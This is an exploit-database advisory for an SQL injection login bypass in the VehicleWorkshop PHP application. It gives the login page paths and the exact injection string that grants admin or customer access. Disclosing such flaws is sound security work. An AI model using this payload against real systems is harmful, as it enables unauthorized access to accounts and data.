[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

VehicleWorkshop - Authentication Bypass Vulnerability

Author
Touhid M.Shaikh
Risk
[
Security Risk High
]
0day-ID
0day-ID-28226
Category
web applications
Date add
01-08-2017
Platform
php
[*] Type: Admin or Customer login bypass via SQL injection
[*] Author: Touhid M.Shaikh
[*] Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
[*] Mail: touhidshaikh22[at]gmail[dot]com
[*] More info: https://blog.touhidshaikh.com/
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
===================== PoC ================
 
Admin Login Page : http://127.0.0.1/emplogin.php
Customer Login Page : http://127.0.0.1/login.php
 
 
Navigate admin login page or Customer Login Page and submit ' OR 1 --+ for
username and password
 
 
 
 
and it should give you access to the admin area or Customer Area.
 
 
Regards.
Touhid Shaikh

#  0day.today [2024-11-15]  #